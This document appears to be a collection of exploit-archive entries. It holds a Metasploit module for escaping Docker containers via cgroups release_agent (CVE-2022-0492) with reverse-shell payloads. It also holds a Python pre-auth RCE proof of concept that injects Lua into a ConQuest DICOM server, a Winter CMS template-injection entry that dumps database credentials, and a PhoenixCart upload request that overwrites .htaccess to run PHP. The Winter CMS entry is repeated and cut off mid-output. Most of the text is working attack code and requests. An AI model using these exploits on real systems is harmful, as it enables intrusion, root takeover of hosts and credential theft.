<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html<br /><br /> include Msf::Post::Linux::Priv<br /> include Msf::Post::Linux::Kernel<br /> include Msf::Post::File<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Docker cgroups Container Escape',<br /> 'Description' => %q{<br /> This exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability.<br /> If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system.<br /><br /> A vulnerability was found in the Linux kernel's cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function.<br /> This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges<br /> and bypass the namespace isolation unexpectedly.<br /><br /> More simply put, cgroups v1 has a feature called release_agent that runs a program when a process in the cgroup terminates.<br /> If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file,<br /> an attacker can execute their own binary with elevated privileges, taking control of the system. However, the release_agent<br /> file is owned by root, so only a user with root access can modify it.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'Yiqi Sun', # discovery<br /> 'Kevin Wang', # discovery<br /> 'T1erno', # POC<br /> ],<br /> 'Platform' => [ 'unix', 'linux' ],<br /> 'SessionTypes' => ['meterpreter'],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> },<br /> 'Privileged' => true,<br /> 'References' => [<br /> [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=24f6008564183aa120d07c03d9289519c2fe02af'],<br /> [ 'URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],<br /> [ 'URL', 'https://github.com/T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC'],<br /> [ 'URL', 'https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492'],<br /> [ 'URL', 'https://github.com/SofianeHamlaoui/CVE-2022-0492-Checker/blob/main/escape-check.sh'],<br /> [ 'URL', 'https://pwning.systems/posts/escaping-containers-for-fun/'],<br /> [ 'URL', 'https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html'],<br /> [ 'URL', 'https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation'],<br /> [ 'URL', 'https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/'],<br /> [ 'CVE', '2022-0492']<br /> ],<br /> 'DisclosureDate' => '2022-02-04',<br /> 'Targets' => [<br /> ['BINARY', { 'Arch' => [ARCH_X86, ARCH_X64], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } }],<br /> ['CMD', { 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } }]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_advanced_options [<br /> OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])<br /> ]<br /> end<br /><br /> def base_dir<br /> datastore['WritableDir']<br /> end<br /><br /> def check<br /> print_status('Unable to determine host OS, this check method is unlikely to be accurate if the host isn\'t Ubuntu')<br /> release = kernel_release<br /> # https://people.canonical.com/~ubuntu-security/cve/2022/CVE-2022-0492<br /> release_short = Rex::Version.new(release.split('-').first)<br /> release_long = Rex::Version.new(release.split('-')[0..1].join('-'))<br /> if release_short >= Rex::Version.new('5.13.0') && release_long < Rex::Version.new('5.13.0-37.42') || # Ubuntu 21.10<br /> release_short >= Rex::Version.new('5.4.0') && release_long < Rex::Version.new('5.4.0-105.119') || # Ubuntu 20.04 LTS<br /> release_short >= Rex::Version.new('4.15.0') && release_long < Rex::Version.new('4.15.0-173.182') || # Ubuntu 18.04 LTS<br /> release_short >= Rex::Version.new('4.4.0') && release_long < Rex::Version.new('4.4.0-222.255') # Ubuntu 16.04 ESM<br /> return CheckCode::Vulnerable("IF host OS is Ubuntu, kernel version #{release} is vulnerable")<br /> end<br /><br /> CheckCode::Safe("Kernel version #{release} may not be vulnerable depending on the host OS")<br /> end<br /><br /> def exploit<br /> # Check if we're already root as its required<br /> fail_with(Failure::NoAccess, 'The exploit needs a session as root (uid 0) inside the container') unless is_root?<br /><br /> # create mount<br /> folder = rand_text_alphanumeric(5..10)<br /> @mount_dir = "#{base_dir}/#{folder}"<br /> register_dir_for_cleanup(@mount_dir)<br /> vprint_status("Creating folder for mount: #{@mount_dir}")<br /> mkdir(@mount_dir)<br /> print_status('Mounting cgroup')<br /> cmd_exec("mount -t cgroup -o rdma cgroup '#{@mount_dir}'")<br /> group = rand_text_alphanumeric(5..10)<br /> group_full_dir = "#{@mount_dir}/#{group}"<br /> vprint_status("Creating folder in cgroup for exploitation: #{group_full_dir}")<br /> mkdir(group_full_dir)<br /><br /> print_status("Enabling notify on release for group #{group}")<br /> write_file("#{group_full_dir}/notify_on_release", '1')<br /><br /> print_status('Determining the host OS path for image')<br /> # for this, we need the line that starts with overlay, and contains an 'upperdir' parameter, which we want the value of<br /> mtab_file = read_file('/etc/mtab')<br /> host_path = nil<br /> mtab_file.each_line do |line|<br /> next unless line.start_with?('overlay') && line.include?('perdir') # upperdir<br /><br /> line.split(',').each do |parameter|<br /> next unless parameter.start_with?('upperdir')<br /><br /> parameter = parameter.split('=')<br /> fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') unless parameter.length > 1<br /> host_path = parameter[1]<br /> end<br /> break<br /> end<br /><br /> fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') if host_path.nil? || host_path.empty? || host_path.start_with?('sed') # start_with catches repeat of command<br /><br /> vprint_status("Host OS path for image: #{host_path}")<br /><br /> payload_path = "#{base_dir}/#{rand_text_alphanumeric(5..10)}"<br /> print_status("Setting release_agent path to: #{host_path}#{payload_path}")<br /> write_file "#{@mount_dir}/release_agent", "#{host_path}#{payload_path}"<br /><br /> print_status("Uploading payload to #{payload_path}")<br /> if target.name == 'CMD'<br /> # for whatever reason it's unhappy and wont run without the /bin/sh header<br /> upload_and_chmodx payload_path, "#!/bin/sh\n#{payload.encoded}\n"<br /> elsif target.name == 'BINARY'<br /> upload_and_chmodx payload_path, generate_payload_exe<br /> end<br /> register_files_for_cleanup(payload_path)<br /><br /> print_status("Triggering payload with command: sh -c \"echo \$\$ > #{group_full_dir}/cgroup.procs\"")<br /> cmd_exec(%(sh -c "echo \$\$ > '#{group_full_dir}/cgroup.procs'"))<br /> end<br /><br /> def cleanup<br /> if @mount_dir<br /> vprint_status("Cleanup: Unmounting #{@mount_dir}")<br /> cmd_exec("umount '#{@mount_dir}'")<br /> end<br /> super<br /> end<br />end<br /></code></pre>
<pre><code>#!/usr/bin/env python3<br /># ---------------------------------------------------------<br /># preauth rce poc for ConQuest Dicom Server (1.5.0d)<br /># ---------------------------------------------------------<br /># 04.08.2023 @ 22:07 <br /># <br /># code610 blogspot com<br /># <br /><br />import socket<br /><br />target = '192.168.56.106'<br />rport = 5678<br /><br />pkt1 = b"\x01\x00\x00\x00\x00\xd0\x00\x01\x00\x00\x43\x4f\x4e\x51\x55\x45\x53\x54\x56\x31"<br />pkt1 += b"\x20\x20\x20\x20\x20\x20\x43\x4f\x4e\x51\x55\x45\x53\x54\x56\x31\x20\x20\x20\x20"<br />pkt1 += b"\x20\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br />pkt1 += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"<br />pkt1 += b"\x10\x00\x00\x15\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x33\x2e\x31\x2e\x31\x2e\x31"<br />pkt1 += b"\x20\x00\x00\x2e\xcb\x00\x00\x00\x30\x00\x00\x11\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x31"<br />pkt1 += b"\x40\x00\x00\x11\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x32"<br />pkt1 += b"\x50\x00\x00\x3d"<br />pkt1 += b"\x51\x00\x00\x04\x00\x00\x80\x00"<br />pkt1 += b"\x52\x00\x00\x22\x31\x2e\x32\x2e\x38\x32\x36\x2e\x30\x2e\x31\x2e\x33\x36\x38\x30\x30\x34\x33\x2e\x32\x2e\x31\x33\x35\x2e\x31\x30\x36\x36\x2e\x31\x30\x31"<br />pkt1 += b"\x55\x00\x00\x0b\x31\x2e\x35\x2e\x30\x2f\x57\x49\x4e\x33\x32"<br /><br /><br />pkt2 = b"\x04\x00\x00\x00\x04\x92\x00\x00\x04\x8e\xcb\x03\x00\x00\x00\x00\x04\x00\x00\x00\x38\x00\x00\x00"<br />pkt2 += b"\x00\x00\x02\x00\x12\x00\x00\x00\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e"<br />pkt2 += b"\x31\x00\x00\x00\x00\x01\x02\x00\x00\x00\x30\x00\x00\x00\x10\x01\x02\x00\x00\x00\x07\x00\x00\x00"<br />pkt2 += b"\x00\x08\x02\x00\x00\x00\x01\x01\x99\x99\x00\x04\x40\x04\x00\x00\x6c\x75\x61\x3a\x6c\x6f\x63\x61"<br />pkt2 += b"\x6c\x20\x66\x69\x72\x73\x74\x3d\x74\x72\x75\x65\x3b\x20\x6c\x6f\x63\x61\x6c\x20\x61\x65\x3d\x5b"<br />pkt2 += b"\x5b\x43\x4f\x4e\x51\x55\x45\x53\x54\x56\x31\x5d\x5d\x3b\x6c\x6f\x63\x61\x6c\x20\x6c\x65\x76\x65"<br />pkt2 += b"\x6c\x3d\x5b\x5b\x50\x41\x54\x49\x45\x4e\x54\x5d\x5d\x3b\x6c\x6f\x63\x61\x6c\x20\x71\x3d\x7b\x51"<br />pkt2 += b"\x75\x65\x72\x79\x52\x65\x74\x72\x69\x65\x76\x65\x4c\x65\x76\x65\x6c\x3d\x5b\x5b\x50\x41\x54\x49"<br />pkt2 += b"\x45\x4e\x54\x5d\x5d\x2c\x50\x61\x74\x69\x65\x6e\x74\x49\x44\x3d\x5b\x5b\x5d\x5d\x2c\x50\x61\x74"<br />pkt2 += b"\x69\x65\x6e\x74\x4e\x61\x6d\x65\x3d\x5b\x5b"<br /><br /># super evil command<br /># rce payload: aaaa]],};local t=os.execute("calc");local z{[[<br />pkt3 = b""<br />pkt3 += b"\x61\x61\x61\x61\x5d\x5d\x2c\x7d\x3b\x6c\x6f\x63\x61\x6c\x20\x74\x3d\x6f\x73\x2e\x65\x78\x65\x63"<br />pkt3 += b"\x75\x74\x65\x28\x22\x63\x61\x6c\x63\x22\x29\x3b\x6c\x6f\x63\x61\x6c\x20\x20\x41\x3d\x7b\x5b\x5b\x41\x42"<br /><br /><br /><br />pkt4 = b"\x5d\x5d\x2c\x7d\x3b\x6c\x6f\x63\x61\x6c\x20\x71\x32\x3d\x44\x69\x63\x6f\x6d\x4f\x62\x6a\x65\x63\x74\x3a\x6e\x65\x77\x28\x29\x3b"<br />pkt4 += b"\x20\x66\x6f\x72\x20\x6b\x2c\x76\x20\x69\x6e\x20\x70\x61\x69\x72\x73\x28\x71\x29\x20\x64\x6f\x20\x71\x32\x5b\x6b\x5d\x3d\x76\x20"<br />pkt4 += b"\x65\x6e\x64\x3b\x6c\x6f\x63\x61\x6c\x20\x72\x32\x3d\x64\x69\x63\x6f\x6d\x71\x75\x65\x72\x79\x28\x61\x65\x2c\x20\x6c\x65\x76\x65"<br />pkt4 += b"\x6c\x2c\x20\x71\x32\x29\x3b\x6c\x6f\x63\x61\x6c\x20\x73\x3d\x74\x65\x6d\x70\x66\x69\x6c\x65\x28\x22\x74\x78\x74\x22\x29\x20\x66"<br />pkt4 += b"\x3d\x69\x6f\x2e\x6f\x70\x65\x6e\x28\x73\x2c\x20\x22\x77\x62\x22\x29\x3b\x69\x66\x20\x72\x32\x3d\x3d\x6e\x69\x6c\x20\x74\x68\x65"<br />pkt4 += b"\x6e\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x6e\x6f\x20\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x20\x77\x69\x74\x68\x20\x22\x2e"<br />pkt4 += b"\x2e\x61\x65\x2e\x2e\x22\x5c\x6e\x22\x29\x20\x72\x65\x74\x75\x72\x6e\x66\x69\x6c\x65\x3d\x73\x20\x66\x3a\x63\x6c\x6f\x73\x65\x28"<br />pkt4 += b"\x29\x20\x72\x65\x74\x75\x72\x6e\x20\x65\x6e\x64\x3b\x20\x6c\x6f\x63\x61\x6c\x20\x72\x20\x3d\x20\x6c\x6f\x61\x64\x73\x74\x72\x69"<br />pkt4 += b"\x6e\x67\x28\x22\x72\x65\x74\x75\x72\x6e\x20\x22\x2e\x2e\x72\x32\x3a\x53\x65\x72\x69\x61\x6c\x69\x7a\x65\x28\x29\x29\x28\x29\x3b"<br />pkt4 += b"\x72\x5b\x31\x5d\x2e\x51\x75\x65\x72\x79\x52\x65\x74\x72\x69\x65\x76\x65\x4c\x65\x76\x65\x6c\x3d\x6e\x69\x6c\x3b\x20\x72\x5b\x31"<br />pkt4 += b"\x5d\x2e\x54\x72\x61\x6e\x73\x66\x65\x72\x53\x79\x6e\x74\x61\x78\x55\x49\x44\x3d\x6e\x69\x6c\x3b\x20\x6c\x6f\x63\x61\x6c\x20\x6b"<br />pkt4 += b"\x65\x79\x73\x3d\x7b\x7d\x20\x66\x6f\x72\x20\x6b\x2c\x76\x20\x69\x6e\x20\x70\x61\x69\x72\x73\x28\x72\x5b\x31\x5d\x29\x20\x64\x6f"<br /><br />pkt5 = b""<br />pkt5 += b"\x20\x69\x66\x20\x74\x79\x70\x65\x28\x76\x29\x7e\x3d\x22\x74\x61\x62\x6c\x65\x22\x20\x74\x68\x65\x6e\x20\x6b\x65\x79\x73\x5b\x23"<br />pkt5 += b"\x6b\x65\x79\x73\x2b\x31\x5d\x3d\x6b\x20\x65\x6e\x64\x20\x65\x6e\x64\x3b\x20\x74\x61\x62\x6c\x65\x2e\x73\x6f\x72\x74\x28\x6b\x65"<br />pkt5 += b"\x79\x73\x2c\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x61\x2c\x20\x62\x29\x20\x72\x65\x74\x75\x72\x6e\x20\x73\x74\x72\x69\x6e\x67"<br />pkt5 += b"\x2e\x73\x75\x62\x28\x61\x2c\x20\x31\x2c\x20\x37\x29\x3c\x73\x74\x72\x69\x6e\x67\x2e\x73\x75\x62\x28\x62\x2c\x20\x31\x2c\x20\x37"<br />pkt5 += b"\x29\x20\x65\x6e\x64\x29\x3b\x20\x69\x66\x20\x66\x69\x72\x73\x74\x20\x74\x68\x65\x6e\x20\x66\x6f\x72\x20\x6b\x2c\x76\x20\x69\x6e"<br />pkt5 += b"\x20\x69\x70\x61\x69\x72\x73\x28\x6b\x65\x79\x73\x29\x20\x64\x6f\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x76\x2e\x2e\x22\x20\x20\x20"<br />pkt5 += b"\x20\x22\x29\x20\x65\x6e\x64\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x5c\x6e\x22\x29\x20\x65\x6e\x64\x20\x69\x66\x20\x66\x69\x72"<br />pkt5 += b"\x73\x74\x20\x74\x68\x65\x6e\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"<br />pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"<br />pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"<br />pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"<br />pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"<br />pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5c\x6e\x22\x29\x20\x65\x6e\x64\x20\x66\x6f\x72\x20\x6b\x2c\x76"<br />pkt5 += b"\x20\x69\x6e\x20\x69\x70\x61\x69\x72\x73\x28\x72\x29\x20\x64\x6f\x20\x20\x20\x66\x6f\x72\x20\x6b\x32\x2c\x76\x32\x20\x69\x6e\x20"<br />pkt5 += b"\x69\x70\x61\x69\x72\x73\x28\x6b\x65\x79\x73\x29\x20\x64\x6f\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x5b\x22\x2e\x2e\x76\x5b\x76"<br />pkt5 += b"\x32\x5d\x2e\x2e\x22\x5d\x20\x20\x20\x20\x22\x29\x20\x65\x6e\x64\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x5c\x6e\x22\x29\x20\x65"<br />pkt5 += b"\x6e\x64\x20\x72\x65\x74\x75\x72\x6e\x66\x69\x6c\x65\x3d\x73\x20\x66\x3a\x63\x6c\x6f\x73\x65\x28\x29\x3b"<br /><br /><br />with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:<br /> print("+ connecting to target...")<br /> s.connect(( target, rport ))<br /> print("+ connected!")<br /><br /> print("+ sending pkt1...")<br /> #s.sendall( pkt1 ) <br /> #data1 = s.recv(1024)<br /> #print("+ recv pkt1:\n%s" % data1)<br /><br /> #print("Data received:\n%s" % data1 )<br /><br /> print("+ sending 2nd and more pkts...")<br /> #s.sendall( pkt2 ) <br /> #s.sendall( pkt3 ) <br /> #s.sendall( pkt3 ) <br /> #s.sendall( pkt5 ) <br /><br /> allpkts = pkt1 + pkt2 + pkt3 + pkt4 + pkt5<br /> s.sendall(allpkts)<br /><br /><br /> print("! should be done :|")<br /><br /><br /><br /><br /><br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated)<br /># Exploit Author: tmrswrr<br /># Date: 12/05/2023<br /># Vendor: https://wintercms.com/<br /># Software Link: https://github.com/wintercms/winter/releases/v1.2.2<br /># Vulnerable Version(s): 1.2.2<br />#Tested : https://www.softaculous.com/demos/WinterCMS<br /><br /><br />1 ) Login with admin cred and click CMS > Pages field > Plugin components > <br /> https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup<br />2 ) Write SSTI payload : {{7*7}}<br />3 ) Save it , Click Priview : <br /> https://demos6.demo.com/WinterCMS/demo/plugins<br />4 ) You will be see result : <br /> 49<br /> Payload :<br /> {{ dump() }}<br /> Result :<br /> <br /> "*::database" => array:4 [▼<br /> "default" => "mysql"<br /> "connections" => array:4 [▼<br /> "sqlite" => array:5 [▼<br /> "database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite"<br /> "driver" => "sqlite"<br /> "foreign_key_constraints" => true<br /> "prefix" => ""<br /> "url" => null<br /> ]<br /> "mysql" => array:15 [▼<br /> "charset" => "utf8mb4"<br /> "collation" => "utf8mb4_unicode_ci"<br /> "database" => "soft_pw3qsny"<br /> "driver" => "mysql"<br /> "engine" => "InnoDB"<br /> "host" => "localhost"<br /> "options" => []<br /> "password" => "8QSz9(pT)3"<br /> "port" => 3306<br /> "prefix" => ""<br /> "prefix_indexes" => true<br /> "strict" => true<br /> "unix_socket" => ""<br /> "url" => null<br /> "username" => "soft_pw3qsny"<br /> ]<br /> "pgsql" => array:12 [▶]<br /> "sqlsrv" => array:10 [▶]<br /> ]<br /> "migrations" => "migrations"<br /> "redis" => array:4 [▼<br /> "client" => "phpredis"<br /> "options" => array:2 [▼<br /> "cluster" => "redis"<br /> "prefix" => "winter_database_"<br /> ]<br /> "default" => array:5 [▼<br /> "database" => "0"<br /> "host" => "127.0.0.1"<br /> "password" => null<br /> "port" => "6379"<br /> "url" => null<br /> ]<br /> "cache" => array:5 [▼<br /> "database" => "1"<br /> "host" => "127.0.0.1"<br /> "password" => null<br /> "port" => "6379"<br /> "url" => null<br /> ]<br /> ]<br /> ]<br /> ]<br /></code></pre>
<pre><code>## Title: PhoenixCart-1.0.8.20-File-Upload-Bypass-override-htaccess-security-RCE<br />## Author: nu11secur1ty<br />## Date: 12/06/2023<br />## Vendor: https://phoenixcart.org/index.php<br />## Software: https://github.com/CE-PhoenixCart/PhoenixCart/archive/master.zip<br />## Reference: https://portswigger.net/web-security/file-upload,<br />https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload<br /><br />## Description:<br />The Categories/Products Product Images upload function, is ABSOLUTELY<br />NOT SANITIZING WELL for file uploading from any type of extension!<br />In this case, you can see a bypassing of .HTACCESS SECURITY file and<br />uploading an info.php exploit file which info.php can be executed from<br />everywhere for dumping the all information about the server! This can<br />be done on the demo server! Please do not do this! I am a Penetration<br />Tester, not a stupid cracker, and that's why I downloaded it,<br />installed it, and tested it!<br />If you want to test it yourself please download it, install it, and test it!<br />Thank you all!<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br />[+]Exploit execution:<br />```POST<br />POST /PhoenixCart/admin/catalog.php?cPath=&action=update_product&pID=10 HTTP/1.1<br />Host: pwnedhost7.com<br />Content-Length: 2952<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Origin: http://pwnedhost7.com<br />Content-Type: multipart/form-data;<br />boundary=----WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Referer: http://pwnedhost7.com/PhoenixCart/admin/catalog.php?cPath=&pID=10&action=new_product<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Cookie: cepcAdminID=ukrk3ssr0jd6iqsnn9ofuccmbt<br />Connection: close<br /><br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="formid"<br /><br />733e378dc8154accdbfd80762cc385f48d5566560ac3b264db19393f9beb268e<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_date_added"<br /><br />2023-12-06 11:36:36<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_status"<br /><br />1<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_quantity"<br /><br />0<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_date_available"<br /><br />2023-12-14 00:00:00<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="manufacturers_id"<br /><br /><br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_model"<br /><br /><br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_tax_class_id"<br /><br />1<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_price"<br /><br />1000.0000<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_price_gross"<br /><br />1070<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_weight"<br /><br />1.00<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_gtin"<br /><br />00000000000001<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_name[1]"<br /><br />pwned<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_description[1]"<br /><br />pwned your services<br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_url[1]"<br /><br /><br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_seo_title[1]"<br /><br /><br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_seo_description[1]"<br /><br /><br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_seo_keywords[1]"<br /><br /><br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_image"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_image_large_1";<br />filename=".htaccess"<br />Content-Type: application/octet-stream<br /><br /># $Id$<br />#<br /># This is used to restrict access to this folder to anything other<br /># than images<br /><br /># Prevents any script files from being accessed from the images folder<br /><FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$"><br /> <IfModule mod_authz_core.c><br /> # Require all denied<br /> </IfModule><br /><br /> <IfModule !mod_authz_core.c><br /> Order Deny,Allow<br /> # Deny from all<br /> Allow from all<br /> </IfModule><br /></FilesMatch><br /><br />Options -Indexes<br /><br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1<br />Content-Disposition: form-data; name="products_image_htmlcontent_1"<br /><br /><br />------WebKitFormBoundaryeDPXR7DpYcn3eWA1--<br /><br />```<br /><br />[+]Response:<br />```PHP<br />GET /PhoenixCart/images/info.php HTTP/1.1<br />Host: pwnedhost7.com<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/CE-Phoenix/2023/PhoenixCart-1.0.8.20)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/12/phoenixcart-10820-file-upload-bypass.html)<br /><br />## Time spent:<br />00:17:00<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and<br />https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html<br />https://cxsecurity.com/ and https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code># Exploit Title: Winter CMS 1.2.2 / 1.2.3 - Server-Side Template Injection (SSTI) (Authenticated)<br /># Exploit Author: tmrswrr<br /># Date: 12/05/2023<br /># Vendor: https://wintercms.com/<br /># Software Link: https://github.com/wintercms/winter/releases/v1.2.2<br /># Vulnerable Version(s): 1.2.2 / 1.2.3<br />#Tested : https://www.softaculous.com/demos/WinterCMS<br /><br /><br />1 ) Login with admin cred and click CMS > Pages field > Plugin components > <br /> https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup<br />2 ) Write SSTI payload : {{7*7}}<br />3 ) Save it , Click Priview : <br /> https://demos6.demo.com/WinterCMS/demo/plugins<br />4 ) You will be see result : <br /> 49<br /> Payload :<br /> {{ dump() }}<br /> Result :<br /> <br /> "*::database" => array:4 [▼<br /> "default" => "mysql"<br /> "connections" => array:4 [▼<br /> "sqlite" => array:5 [▼<br /> "database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite"<br /> "driver" => "sqlite"<br /> "foreign_key_constraints" => true<br /> "prefix" => ""<br /> "url" => null<br /> ]<br /> "mysql" => array:15 [▼<br /> "charset" => "utf8mb4"<br /> "collation" => 